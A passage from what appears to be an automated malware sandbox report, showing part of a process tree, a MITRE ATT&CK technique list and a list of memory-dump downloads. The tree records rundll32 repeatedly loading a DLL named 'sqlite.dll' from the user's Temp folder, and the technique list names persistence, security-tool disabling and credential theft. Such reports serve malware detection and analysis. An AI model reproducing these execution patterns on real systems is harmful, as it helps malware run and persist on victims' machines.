    3⤵
    - Kills process with taskkill
    PID:11736

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:10112
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:2236

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:10152
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8448

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6532

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/288-141-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/288-140-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/288-135-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/288-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/288-145-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/288-136-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/288-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/288-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/288-146-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/288-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/288-144-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/288-147-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/600-306-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/788-255-0x0000000000400000-0x00000000016FB000-memory.dmp

Filesize
19.0MB

Download
memory/788-195-0x00000000017F9000-0x0000000001848000-memory.dmp

Filesize
316KB

Download
memory/788-254-0x0000000003350000-0x00000000033DE000-memory.dmp

Filesize
568KB

Download
memory/808-456-0x0000023268350000-0x00000232683C2000-memory.dmp

Filesize
456KB

Download
memory/1012-404-0x000001C310A60000-0x000001C310AD2000-memory.dmp

Filesize
456KB

Download
memory/1100-459-0x000002AB81760000-0x000002AB817D2000-memory.dmp

Filesize
456KB

Download
memory/1124-322-0x0000000000400000-0x0000000002F02000-memory.dmp

Filesize
43.0MB

Download
memory/1124-311-0x0000000002F60000-0x0000000002F69000-memory.dmp

Filesize
36KB

Download
memory/1152-489-0x0000028C09D10000-0x0000028C09D82000-memory.dmp

Filesize
456KB

Download
memory/1160-218-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/1160-287-0x0000000007AB0000-0x0000000007AB1000-memory.dmp

Filesize
4KB

Download
memory/1160-237-0x00000000073A0000-0x00000000073A1000-memory.dmp

Filesize
4KB

Download
memory/1160-238-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/1160-240-0x0000000004C92000-0x0000000004C93000-memory.dmp

Filesize
4KB

Download
memory/1160-272-0x0000000007150000-0x0000000007151000-memory.dmp

Filesize
4KB

Download
memory/1160-216-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/1160-286-0x0000000007A40000-0x0000000007A41000-memory.dmp

Filesize
4KB

Download
memory/1160-233-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

Filesize
4KB

Download
memory/1160-371-0x0000000004C93000-0x0000000004C94000-memory.dmp

Filesize
4KB

Download
memory/1160-291-0x0000000007B20000-0x0000000007B21000-memory.dmp

Filesize
4KB

Download
memory/1160-352-0x000000007EDC0000-0x000000007EDC1000-memory.dmp

Filesize
4KB

Download
memory/1220-350-0x0000000005900000-0x0000000005A4C000-memory.dmp

Filesize
1.3MB

Download
memory/1344-501-0x0000013971060000-0x00000139710D2000-memory.dmp

Filesize
456KB

Download
memory/1352-471-0x0000025D431A0000-0x0000025D43212000-memory.dmp

Filesize
456KB

Download
memory/1364-217-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/1420-294-0x0000000004ED0000-0x00000000054D6000-memory.dmp

Filesize
6.0MB

Download
memory/1420-288-0x0000000004F10000-0x0000000004F11000-memory.dmp

Filesize
4KB

Download
memory/1420-258-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1524-359-0x0000000005460000-0x00000000055AC000-memory.dmp

Filesize
1.3MB

Download
memory/1864-473-0x000001E9CF8C0000-0x000001E9CF932000-memory.dmp

Filesize
456KB

Download
memory/2020-292-0x0000000004C80000-0x0000000005286000-memory.dmp

Filesize
6.0MB

Download
memory/2020-279-0x0000000004E60000-0x0000000004E61000-memory.dmp

Filesize
4KB

Download
memory/2020-273-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/2020-256-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2020-284-0x0000000004D90000-0x0000000004D91000-memory.dmp

Filesize
4KB

Download
memory/2020-276-0x0000000004D30000-0x0000000004D31000-memory.dmp

Filesize
4KB

Download
memory/2096-213-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2124-247-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/2136-222-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/2136-249-0x00000000055E0000-0x00000000055E1000-memory.dmp

Filesize
4KB

Download
memory/2144-347-0x000002842D3A0000-0x000002842D501000-memory.dmp

Filesize
1.4MB

Download
memory/2144-344-0x000002842D540000-0x000002842D69B000-memory.dmp

Filesize
1.4MB

Download
memory/2264-360-0x00000000012A0000-0x00000000012B6000-memory.dmp

Filesize
88KB

Download
memory/2264-543-0x00000000058F0000-0x00000000059D7000-memory.dmp

Filesize
924KB

Download
memory/2292-416-0x0000024058170000-0x00000240581E2000-memory.dmp

Filesize
456KB

Download
memory/2316-450-0x0000022C63350000-0x0000022C633C2000-memory.dmp

Filesize
456KB

Download
memory/2432-215-0x0000000000C50000-0x0000000000C52000-memory.dmp

Filesize
8KB

Download
memory/2432-209-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/2480-391-0x0000016E47D80000-0x0000016E47DF2000-memory.dmp

Filesize
456KB

Download
memory/2548-504-0x0000016957E00000-0x0000016957E72000-memory.dmp

Filesize
456KB

Download
memory/2556-507-0x0000025F7A640000-0x0000025F7A6B2000-memory.dmp

Filesize
456KB

Download
memory/2688-303-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/3004-231-0x0000000000D80000-0x0000000000D81000-memory.dmp

Filesize
4KB

Download
memory/3004-248-0x0000000003030000-0x00000000030A6000-memory.dmp

Filesize
472KB

Download
memory/3048-230-0x0000000000B30000-0x0000000000B31000-memory.dmp

Filesize
4KB

Download
memory/3048-250-0x00000000054B0000-0x00000000054B1000-memory.dmp

Filesize
4KB

Download
memory/3048-241-0x0000000002CD0000-0x0000000002CD1000-memory.dmp

Filesize
4KB

Download
memory/3068-251-0x0000000005AD0000-0x0000000005AD1000-memory.dmp

Filesize
4KB

Download
memory/3068-234-0x0000000005510000-0x0000000005511000-memory.dmp

Filesize
4KB

Download
memory/3068-242-0x0000000002FF0000-0x0000000002FF1000-memory.dmp

Filesize
4KB

Download
memory/3068-246-0x00000000030B0000-0x00000000030B1000-memory.dmp

Filesize
4KB

Download
memory/3068-223-0x0000000000C60000-0x0000000000C61000-memory.dmp

Filesize
4KB

Download
memory/3184-310-0x0000000000400000-0x0000000002F22000-memory.dmp

Filesize
43.1MB

Download
memory/3184-309-0x0000000004B40000-0x0000000004B89000-memory.dmp

Filesize
292KB

Download
memory/3208-259-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3208-295-0x0000000005520000-0x0000000005B26000-memory.dmp

Filesize
6.0MB

Download
memory/3348-408-0x000001CE26D80000-0x000001CE26DCD000-memory.dmp

Filesize
308KB

Download
memory/3348-421-0x000001CE26E40000-0x000001CE26EB2000-memory.dmp

Filesize
456KB

Download
memory/3372-186-0x0000000000C90000-0x0000000000C91000-memory.dmp

Filesize
4KB

Download
memory/3372-192-0x0000000000C90000-0x0000000000C91000-memory.dmp

Filesize
4KB

Download
memory/4132-331-0x0000000000D40000-0x0000000000D41000-memory.dmp

Filesize
4KB

Download
memory/4368-368-0x0000000077520000-0x00000000776AE000-memory.dmp

Filesize
1.6MB

Download
memory/4368-413-0x0000000005DB0000-0x0000000005DB1000-memory.dmp

Filesize
4KB

Download
memory/4456-541-0x0000000000F80000-0x00000000012A0000-memory.dmp

Filesize
3.1MB

Download
memory/4456-542-0x0000000000C50000-0x0000000000C61000-memory.dmp

Filesize
68KB

Download
memory/4464-556-0x0000000077520000-0x00000000776AE000-memory.dmp

Filesize
1.6MB

Download
memory/4464-558-0x00000000058D0000-0x00000000058D1000-memory.dmp

Filesize
4KB

Download
memory/4512-476-0x0000000004F00000-0x0000000004F01000-memory.dmp

Filesize
4KB

Download
memory/4700-453-0x00000000054F0000-0x00000000054F1000-memory.dmp

Filesize
4KB

Download
memory/4700-399-0x0000000077520000-0x00000000776AE000-memory.dmp

Filesize
1.6MB

Download
memory/4716-389-0x00000000042CE000-0x00000000043CF000-memory.dmp

Filesize
1.0MB

Download
memory/4716-395-0x0000000004430000-0x000000000448D000-memory.dmp

Filesize
372KB

Download
memory/4788-538-0x0000000000400000-0x00000000004D9000-memory.dmp

Filesize
868KB

Download
memory/4788-534-0x0000000002020000-0x000000000209C000-memory.dmp

Filesize
496KB

Download
memory/4788-536-0x00000000021F0000-0x00000000022C6000-memory.dmp

Filesize
856KB

Download
memory/4920-401-0x0000025104D70000-0x0000025104DE2000-memory.dmp

Filesize
456KB

Download
memory/5152-560-0x0000000000820000-0x0000000000839000-memory.dmp

Filesize
100KB

Download
memory/5152-561-0x0000000002930000-0x0000000002959000-memory.dmp

Filesize
164KB

Download